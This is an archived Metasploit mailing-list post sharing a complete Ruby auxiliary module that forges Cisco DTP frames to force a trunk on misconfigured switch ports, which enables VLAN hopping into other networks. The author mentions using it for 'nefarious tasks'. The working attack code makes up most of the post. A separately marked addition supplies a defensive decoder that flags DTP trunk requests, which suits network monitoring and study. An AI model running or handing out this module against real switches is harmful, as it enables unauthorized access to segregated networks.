Metasploit mailing list archives

Dynamic Trunk Protocol (DTP) Module


From: Spencer McIntyre <zerosteiner () gmail com>
Date: Thu, 08 Jul 2010 23:24:52 -0700

I have written a module for Metasploit that will forge DTP packets to negotiate a trunk with a Cisco switch that has been improperly configured with the "switchport mode auto" setting. This module, although not significant in itself, places the user in a position to add an 802.1Q interface onto their system and access another network or do other nefarious tasks. It might be worthwhile to also mention that this is not exploiting a flaw within IOS but a feature. I am currently testing a PVSTP+ module I have also written that works well in conjunction with this DTP module.

By default this module runs in the background and periodically sends a DTP packet to keep the trunk connection alive. I hope someone else finds this useful.

Spencer McIntyre
zeroSteiner () gmail com

#begin auxiliary/spoof/cisco/dtp.rb
require 'msf/core'
require 'racket'

class Metasploit3 < Msf::Auxiliary

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Forge DTP Packets',
            'Description'    => %q{
                This module forges DTP packets to initialize a trunk port.
            },
            'Author'         => [ 'Spencer McIntyre' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 7 $',
            'Actions'        =>
                [
                    [ 'Service' ]
                ],
            'PassiveActions' =>
                [
                    'Service'
                ],
            'DefaultAction'  => 'Service'
        ))
        register_options([
            OptString.new('DOMAIN', [ false,  "DTP Domain Name", '']),
            OptString.new('IFACE', [ true,  "Interface To Use", 'eth0']),
        ], self.class)
    end

    def run
        n = Racket::Racket.new
        @run = true
        domain = datastore['DOMAIN']
        if domain == ""
            domain = "\x00\x00\x00\x00\x00\x00\x00\x00\x00"    #an empty domain is sent as nine null bytes
        end

        n.l2 = Racket::L2::Ethernet.new()
        n.l2.dst_mac = '01:00:0c:cc:cc:cc'    #this has to stay the same (Cisco multicast address shared by CDP/VTP/DTP)
        n.l2.ethertype = (domain.length + 34)    #802.3 length field: 8 byte LLC/SNAP + 26 bytes of fixed DTP fields + domain

        n.l3 = Racket::L2::LLC.new()    #LLC with SNAP: dsap/ssap 0xaa, control 0x03, then OUI + protocol id
        n.l3.control = 0x03
        n.l3.dsap = 0xaa
        n.l3.ssap = 0xaa
        cisco_vendor_code = "\x00\x00\x0c"    #Cisco OUI
        pid = "\x20\x04"    #2004 is DTP
        n.l3.payload = cisco_vendor_code + pid

        #DTP info section: one version byte followed by type/length/value records,
        #where each length counts the 4 byte type+length header as well as the value
        dtp_version = "\x01"

        dtp_domain_type = "\x00\x01"
        dtp_domain_len = [ (domain.length + 5) ].pack("n")    #4 byte header + domain + null terminator
        dtp_domain = domain + "\x00"
        dtp_domain_section = dtp_domain_type + dtp_domain_len + dtp_domain

        dtp_status_type = "\x00\x02"
        dtp_status_len = "\x00\x05"
        dtp_status = "\x03"    #trunk status byte
        dtp_status_section = dtp_status_type + dtp_status_len + dtp_status

        dtp_type_type = "\x00\x03"
        dtp_type_len = "\x00\x05"
        dtp_type = "\xa5"    #trunk type byte
        dtp_type_section = dtp_type_type + dtp_type_len + dtp_type

        dtp_neighbor_type = "\x00\x04"
        dtp_neighbor_len = "\x00\x0a"
        dtp_neighbor = "\x11\x22\x33\x44\x55\x66"    #6 byte neighbor (sender) MAC
        dtp_neighbor_section = dtp_neighbor_type + dtp_neighbor_len + dtp_neighbor

        n.l3.payload += dtp_version + dtp_domain_section + dtp_status_section +
            dtp_type_section + dtp_neighbor_section

        n.iface = datastore['IFACE']
        n.pack()
        while @run    #passive action: keep resending every 30 seconds so the trunk stays up
            n.send2()
            select(nil, nil, nil, 30)
        end

    end

end
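As an added example that is not part of this post or Spencer's module, here is a decoder for the frame layout the module builds (802.3 length, LLC/SNAP, version byte, then type/length/value records), the kind of check a switch-port monitor could run over captured frames to flag a host announcing that it wants a trunk. The status-byte layout (0x80 = trunk operating, low bits 1=on, 2=off, 3=desirable, 4=auto) is assumed from the Wireshark DTP dissector, and the sample frame is constructed here to match the module's output with an empty DOMAIN.

```ruby
# Constructed constants: the Cisco multicast MAC the module sends to, and the
# LLC/SNAP header (DSAP/SSAP 0xaa, control 0x03, Cisco OUI 00:00:0c, PID 0x2004).
DTP_MCAST  = "\x01\x00\x0c\xcc\xcc\xcc".b
CISCO_SNAP = "\xaa\xaa\x03\x00\x00\x0c\x20\x04".b
# Assumed status-byte layout (from the Wireshark DTP dissector): bit 0x80 is the
# trunk operating status, the low bits are the administrative status below.
TAS = { 1 => 'on', 2 => 'off', 3 => 'desirable', 4 => 'auto' }

# Parse an 802.3 frame into the DTP version byte plus type => value TLVs; nil if not DTP.
def parse_dtp(frame)
  frame = frame.b
  return nil unless frame[0, 6] == DTP_MCAST && frame.length >= 14
  length = frame[12, 2].unpack1('n')         # 802.3 length field, not an ethertype
  body = frame[14, length]
  return nil unless body && body.length == length && body[0, 8] == CISCO_SNAP
  dtp = body[8..-1]
  info = { version: dtp.getbyte(0), tlvs: {} }
  off = 1
  while off + 4 <= dtp.length
    type, len = dtp[off, 4].unpack('nn')     # TLV length counts its own 4-byte header
    break if len < 4 || off + len > dtp.length
    info[:tlvs][type] = dtp[off + 4, len - 4]
    off += len
  end
  info
end

# Summarise a frame for an alert: a host on an access port announcing
# "on" or "desirable" is asking the switch to bring up a trunk.
def assess(frame)
  info = parse_dtp(frame)
  return { dtp: false } unless info
  status = info[:tlvs][2] && info[:tlvs][2].getbyte(0)
  tas = status ? TAS.fetch(status & 0x07, 'unknown') : 'unknown'
  { dtp: true, version: info[:version],
    domain: info[:tlvs][1].to_s.delete("\x00"),
    trunk_operating: status ? (status & 0x80) != 0 : nil,
    tas: tas, negotiates_trunk: %w[on desirable].include?(tas),
    neighbor: info[:tlvs][4] && info[:tlvs][4].unpack1('H*') }
end

# Constructed sample: the frame the module emits with an empty DOMAIN
# (nine NUL bytes plus terminator), sent from 11:22:33:44:55:66.
SAMPLE_FRAME = DTP_MCAST + "\x11\x22\x33\x44\x55\x66".b + [43].pack('n') +
               CISCO_SNAP + "\x01".b +
               "\x00\x01\x00\x0e".b + ("\x00" * 10).b +    # domain TLV
               "\x00\x02\x00\x05\x03".b +                   # status TLV: access, desirable
               "\x00\x03\x00\x05\xa5".b +                   # type TLV
               "\x00\x04\x00\x0a\x11\x22\x33\x44\x55\x66".b # neighbor TLV
```

Running `assess(SAMPLE_FRAME)` reports the empty domain, a "desirable" administrative status with the trunk not yet operating, and the sender MAC from the neighbor TLV.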
